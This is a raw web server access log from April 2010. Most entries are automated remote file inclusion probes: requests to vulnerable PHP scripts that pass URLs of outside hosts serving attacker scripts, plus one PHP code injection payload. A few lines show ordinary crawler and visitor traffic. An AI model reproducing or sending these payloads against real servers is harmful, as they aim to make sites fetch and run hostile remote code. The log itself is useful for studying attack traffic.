121.254.228.21 - - [19/Apr/2010:08:43:38 -0500] "GET /logs/access_log.1268611200//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.21 - - [19/Apr/2010:08:43:38 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:08:44:05 -0500] "GET /logs/port.php?content=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:08:44:05 -0500] "GET /logs/access_log.1263600000/port.php?content=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:08:44:06 -0500] "GET /port.php?content=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:08:44:14 -0500] "GET /logs/access_log.1263859200/port.php?content=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:08:44:43 -0500] "GET //mcf.php?content=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:08:44:43 -0500] "GET /logs//mcf.php?content=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:08:44:43 -0500] "GET /logs/access_log.1266192000//mcf.php?content=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.46.157.102 - - [19/Apr/2010:08:45:27 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://jojermanagement.com/phpauction/.safe?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.46.157.102 - - [19/Apr/2010:08:45:27 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://jojermanagement.com/phpauction/.safe?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.46.157.102 - - [19/Apr/2010:08:45:28 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://jojermanagement.com/phpauction/.safe?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.46.157.102 - - [19/Apr/2010:08:45:49 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://jojermanagement.com/phpauction/.safe?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
217.70.32.2 - - [19/Apr/2010:08:46:56 -0500] "GET //mcf.php?content=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:08:46:56 -0500] "GET /logs//mcf.php?content=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:08:46:56 -0500] "GET /logs/access_log.1225929600//mcf.php?content=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:08:48:24 -0500] "GET /logs/access_log.1212969600//mcf.php?content=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:08:50:44 -0500] "GET /logs//mcf.php?content=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:08:50:44 -0500] "GET //mcf.php?content=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:08:50:44 -0500] "GET /logs/access_log.1212969600//mcf.php?content=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.46.199.194 - - [19/Apr/2010:08:55:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.176.226.170 - - [19/Apr/2010:08:59:41 -0500] "GET /logs/access_log.1252368000//appserv/main.php?appserv_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:08:59:41 -0500] "GET //appserv/main.php?appserv_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:08:59:41 -0500] "GET /logs/access_log.1262476800//appserv/main.php?appserv_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:08:59:41 -0500] "GET /logs//appserv/main.php?appserv_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:01:10 -0500] "GET /logs/access_log.1252368000//appserv/main.php?appserv_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:01:10 -0500] "GET //appserv/main.php?appserv_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:01:10 -0500] "GET /logs//appserv/main.php?appserv_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.233.62.115 - - [19/Apr/2010:09:01:33 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ntels.com/111//kcounter/stats/idomila.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
211.233.62.115 - - [19/Apr/2010:09:01:33 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ntels.com/111//kcounter/stats/idomila.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
211.55.232.50 - - [19/Apr/2010:09:01:33 -0500] "GET /http://moncrot.justfree.com/idourcrew.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
81.176.226.170 - - [19/Apr/2010:09:04:25 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:04:25 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:04:25 -0500] "GET /logs/access_log.1219708800%20%20//modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:04:27 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:04:27 -0500] "GET /logs/access_log.1219708800%20%20//modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:04:27 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:04:28 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:04:28 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:04:28 -0500] "GET /logs/access_log.1219708800%20%20//modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:04:29 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:04:29 -0500] "GET /logs/access_log.1219708800%20%20//modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:04:29 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:09:06:26 -0500] "GET /logs/access_log.1267920000//components/com_facileforms/facileforms.frame.php?ff_compath=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:09:06:26 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:09:06:26 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:09:06:41 -0500] "GET /logs/access_log.1268265600//components/com_facileforms/facileforms.frame.php?ff_compath=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:06:54 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:06:54 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:06:54 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:06:54 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:06:54 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:06:54 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:06:54 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:06:55 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:06:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:06:55 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:06:56 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:07:09 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:07:48 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:07:48 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:07:48 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:07:48 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.233.62.115 - - [19/Apr/2010:09:08:26 -0500] "GET /logs/access_log.1217376000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ntels.com/111//kcounter/stats/idomila.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
211.233.62.115 - - [19/Apr/2010:09:08:27 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ntels.com/111//kcounter/stats/idomila.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
211.233.62.115 - - [19/Apr/2010:09:08:27 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ntels.com/111//kcounter/stats/idomila.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
207.46.199.50 - - [19/Apr/2010:09:08:48 -0500] "GET /logs/access_log.1217116800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.70.32.2 - - [19/Apr/2010:09:08:59 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:09:08:59 -0500] "GET /logs/access_log.1212969600//components/com_facileforms/facileforms.frame.php?ff_compath=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:09:09:02 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
130.111.224.10 - - [19/Apr/2010:09:09:32 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.com/search?q=guy+decomeau+1450+mary+medici&btnG=Search&hl=en&rlz=1G1GGLQ_ENUS248&sa=2""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
130.111.224.10 - - [19/Apr/2010:09:09:33 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
130.111.224.10 - - [19/Apr/2010:09:09:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
217.70.32.2 - - [19/Apr/2010:09:10:11 -0500] "GET /logs/access_log.1220054400//components/com_facileforms/facileforms.frame.php?ff_compath=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.233.62.115 - - [19/Apr/2010:09:10:13 -0500] "GET /logs/access_log.1217376000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ntels.com/111//kcounter/stats/idomila.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
211.233.62.115 - - [19/Apr/2010:09:10:14 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ntels.com/111//kcounter/stats/idomila.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
211.233.62.115 - - [19/Apr/2010:09:10:14 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ntels.com/111//kcounter/stats/idomila.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
78.138.88.234 - - [19/Apr/2010:09:13:35 -0500] "GET /logs/access_log.1262822400//delete_all.php?board_skin_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
78.138.88.234 - - [19/Apr/2010:09:13:35 -0500] "GET /logs//delete_all.php?board_skin_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
78.138.88.234 - - [19/Apr/2010:09:13:35 -0500] "GET //delete_all.php?board_skin_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
78.138.88.234 - - [19/Apr/2010:09:13:35 -0500] "GET /logs/access_log.1262563200//delete_all.php?board_skin_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.204.192 - - [19/Apr/2010:09:15:17 -0500] "GET /logs/access_log.1200787200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.176.226.170 - - [19/Apr/2010:09:16:50 -0500] "GET /logs/access_log.1217548800%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
119.235.18.81 - - [19/Apr/2010:09:16:56 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
119.235.18.81 - - [19/Apr/2010:09:16:56 -0500] "GET /logs/access_log.1216512000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0"
119.235.18.81 - - [19/Apr/2010:09:16:56 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:17:23 -0500] "GET /logs/access_log.1217548800%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:17:23 -0500] "GET /logs/access_log.1217462400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:18:53 -0500] "GET /logs/access_log.1217462400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
203.19.4.18 - - [19/Apr/2010:09:18:58 -0500] "GET /logs/access_log.1268265600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
66.113.99.66 - - [19/Apr/2010:09:20:06 -0500] "GET /logs/access_log.1235779200/?sourcedir=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.113.99.66 - - [19/Apr/2010:09:20:06 -0500] "GET /?sourcedir=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
66.113.99.66 - - [19/Apr/2010:09:20:06 -0500] "GET /logs/?sourcedir=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 200 2329 "-""Mozilla/5.0"
66.113.99.66 - - [19/Apr/2010:09:20:39 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
66.113.99.66 - - [19/Apr/2010:09:20:39 -0500] "GET /logs/access_log.1268265600/joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.113.99.66 - - [19/Apr/2010:09:20:39 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
212.59.2.84 - - [19/Apr/2010:09:21:32 -0500] "GET /?INCLUDE_FOLDER=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.59.2.84 - - [19/Apr/2010:09:21:32 -0500] "GET /logs/?INCLUDE_FOLDER=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 2329 "-""Mozilla/5.0"
212.59.2.84 - - [19/Apr/2010:09:21:32 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.113.99.66 - - [19/Apr/2010:09:21:35 -0500] "GET /logs/access_log.1268265600%20%20/joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:22:02 -0500] "GET /logs/access_log.1217462400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.176.226.170 - - [19/Apr/2010:09:22:02 -0500] "GET /logs/access_log.1217548800%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
110.45.143.142 - - [19/Apr/2010:09:22:14 -0500] "GET /logs/access_log.1268265600%20%20/joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
110.45.143.142 - - [19/Apr/2010:09:22:14 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
110.45.143.142 - - [19/Apr/2010:09:22:14 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:19 -0500] "GET //index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:19 -0500] "GET /logs/access_log.1268265600%20%20//index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:19 -0500] "GET /logs//index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.243.57.5 - - [19/Apr/2010:09:22:33 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
83.243.57.5 - - [19/Apr/2010:09:22:33 -0500] "GET /logs/access_log.1268265600%20%20/joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
83.243.57.5 - - [19/Apr/2010:09:22:33 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
66.113.99.66 - - [19/Apr/2010:09:22:38 -0500] "GET /logs/access_log.1219449600/?sourcedir=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:39 -0500] "GET /logs/access_log.1268265600//index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:39 -0500] "GET //index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:39 -0500] "GET /logs//index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
110.45.143.142 - - [19/Apr/2010:09:22:43 -0500] "GET /logs/access_log.1268265600/joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
207.46.204.189 - - [19/Apr/2010:09:22:47 -0500] "GET /logs/access_log.1247270400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.243.57.5 - - [19/Apr/2010:09:22:48 -0500] "GET /logs/access_log.1268265600/joomla/index.php?option=com_restaurante&task=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:50 -0500] "GET /logs/access_log.1225238400//index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:50 -0500] "GET //index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:50 -0500] "GET /logs//index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:52 -0500] "GET /logs//index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:52 -0500] "GET //index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:52 -0500] "GET /logs/access_log.1268265600//index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.149.228.44 - - [19/Apr/2010:09:22:58 -0500] "GET /logs/access_log.1262736000//index.php?option=com_restaurante&task=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
